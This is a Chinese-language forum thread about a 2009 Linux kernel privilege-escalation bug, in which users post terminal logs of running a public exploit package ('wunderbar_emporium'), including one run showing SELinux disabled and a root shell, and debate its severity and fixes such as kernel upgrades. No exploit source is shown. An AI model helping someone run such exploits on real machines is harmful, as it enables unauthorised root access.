黑客再爆Linux内核高危漏洞 一个命令可以攻击所有Linux系统

[syrano]

看baoz的blog 貌似不开SElinux就没有事～～

牛X

[ruichi]

用的人多了，就会出事情。。。

[john.wu]

代码： 全选

 ls
exploit.c   pwnkernel    tzameti.avi
exploit.so  pwnkernel.c  wunderbar_emporium.sh
[John@arch wunderbar_emporium]$ ./w*
 [+] Personality set to: PER_SVR4
UNABLE TO MAP ZERO PAGE!
^C[john@arch wunderbar_emporium]$ uname -a
Linux arch 2.6.30-ARCH #1 SMP PREEMPT Fri Jul 31 18:10:38 UTC 2009 i686 AMD Athlon(tm) 64 X2 Dual-Core Processor TK-53 AuthenticAMD GNU/Linux
[john@arch wunderbar_emporium]$ 

装了pluseaudio，卡在：
UNABLE TO MAP ZERO PAGE!

[yuu1010]

就能执行个uname -a 算什么？
能把 根分区下的文件全部删除掉吗？

执行uname -a是为了让别人看到内核版本

俺的ubuntu 8.04中招

[chpn]

用的人多了，就会出事情。。。

虽然是个高危漏洞，但是也仅仅是个没有多少利用价值的漏洞。
现在漏洞的攻击源码都公开了的，我的电脑没作任何防范，你有本事把我的电脑攻下来吗？
你能打开我家里的保险柜，但是你进不到我的家门，有何用？

[bones7456]

用的人多了，就会出事情。。。

虽然是个高危漏洞，但是也仅仅是个没有多少利用价值的漏洞。
现在漏洞的攻击源码都公开了的，我的电脑没作任何防范，你有本事把我的电脑攻下来吗？
你能打开我家里的保险柜，但是你进不到我的家门，有何用？

这么说就不对了，如果能非法提升到root权限的话，确实是个很大的漏洞了，很多服务器会遭殃的。

[lerosua]

嗯，提升root的漏洞很危险的。桌面机用户就觉得没啥价值，但服务器的就不同了。

[john.wu]

代码： 全选

ls
exploit.c   pwnkernel    tzameti.avi
exploit.so  pwnkernel.c  wunderbar_emporium.sh
john@ubuntu:/media/disk/wunderbar_emporium$ sh wunderbar_emporium.sh 
: not foundmporium.sh: 1: �PNG
wunderbar_emporium.sh: 2: : not found
wunderbar_emporium.sh: 3: Syntax error: ")" unexpected
john@ubuntu:/media/disk/wunderbar_emporium$ ./w*
：找不到命令emporium.sh: line 1: �PNG
./wunderbar_emporium.sh: line 2: ：找不到命令
./wunderbar_emporium.sh: line 3: 在未预料的“)”附近出现语法错误
IHDRA�s��bKGD������� `      pHYs
                                            
                                             ��tIME�	A���tEXtCommentCreated with The GIMP�d%nIDATX��ٽn�P���q�M�LT�P�
                                                                     ���7
                                                                              �
   ��vC�������T���
                                    �I,u`�ɻD:gz~z�XI������}ʲd�G)E��<{�T�������p8$�s'|�g0���K�^�y]~�����k��}'��1��{������|Ƀ�79��@�v��<?��ծ�g��9:�'�='���Q��JQ�=+`L���{~��J�R�4��3q!M2��X)�!#9�tIQ��G@�L�ɱ���1cȲ
                                                                          c��Pg5fADH���4M�&��vu�'
john@ubuntu:/media/disk/wunderbar_emporium$ uname -a
Linux ubuntu 2.6.28-15-generic #48-Ubuntu SMP Wed Jul 29 08:54:56 UTC 2009 i686 GNU/Linux

arch 下还能运行，但不能攻击成功，在ubuntu 9.04下完全不能运行，请问楼上几位成功的朋友，ubuntu下怎么才能让这个攻击代码运行通过？

[hubert_star]

所以，服务器部署的第一件事，就是把gcc给拿走

[lwbskfish]

我的Debian系统试过了，没问题(kernel 2.6.26-2)

代码： 全选

lwb@netfish:~$ cd safe
lwb@netfish:~/safe$ ./w*
cat: tzameti.avi: 没有那个文件或目录
 [+] MAPPED ZERO PAGE!
 [+] Resolved sel_read_enforce to 0xc01c1e4f
 [+] got ring0!
 [+] detected 2.6 style 8k stacks
MPlayer SVN-r29142-4.3.3 (C) 2000-2009 MPlayer Team
mplayer: could not connect to socket
mplayer: No such file or directory
Failed to open LIRC support. You will not be able to use your remote control.

Playing /tmp/video.gl5iUD.
libavformat file format detected.
[lavf] Audio stream found, -aid 0
==========================================================================
Opening audio decoder: [pcm] Uncompressed PCM audio decoder
AUDIO: 48000 Hz, 2 ch, s16le, 64.0 kbit/4.17% (ratio: 8000->192000)
Selected audio codec: [pcm] afm: pcm (Uncompressed PCM)
==========================================================================
[AO OSS] audio_setup: Can't open audio device /dev/dsp: No such file or directory
Failed to initialize audio driver 'oss'
Could not open/initialize audio device -> no sound.
Audio: no sound
Video: no video


Exiting... (End of file)
 [+] Disabled security of : SELinux
 [+] Got root!
# 

太强悍了

[john.wu]

我的Debian系统试过了，没问题(kernel 2.6.26-2)

代码： 全选

lwb@netfish:~$ cd safe
lwb@netfish:~/safe$ ./w*
cat: tzameti.avi: 没有那个文件或目录
 [+] MAPPED ZERO PAGE!
 [+] Resolved sel_read_enforce to 0xc01c1e4f
 [+] got ring0!
 [+] detected 2.6 style 8k stacks
MPlayer SVN-r29142-4.3.3 (C) 2000-2009 MPlayer Team
mplayer: could not connect to socket
mplayer: No such file or directory
Failed to open LIRC support. You will not be able to use your remote control.

Playing /tmp/video.gl5iUD.
libavformat file format detected.
[lavf] Audio stream found, -aid 0
==========================================================================
Opening audio decoder: [pcm] Uncompressed PCM audio decoder
AUDIO: 48000 Hz, 2 ch, s16le, 64.0 kbit/4.17% (ratio: 8000->192000)
Selected audio codec: [pcm] afm: pcm (Uncompressed PCM)
==========================================================================
[AO OSS] audio_setup: Can't open audio device /dev/dsp: No such file or directory
Failed to initialize audio driver 'oss'
Could not open/initialize audio device -> no sound.
Audio: no sound
Video: no video


Exiting... (End of file)
 [+] Disabled security of : SELinux
 [+] Got root!
# 

太强悍了

终于明linux高手为什么不愿意多装一个xx库, 看来我要着手精简系统了： 不用的模块，不用的库，不用的软件

[ptpt52]

赶紧升级内核到 2.6.31-rc6

[哇哎噜]

[NetDreamer]

弱弱地问一下：
“./w*"这个命令在哪儿执行，如何执行？

[wangdu2002]

楼上的兄弟不认真看贴啊，要执行./w*需要先下载一个文件，那个脚本文件是以w开头的，在前面的兄弟给出了这个文件的下载链接。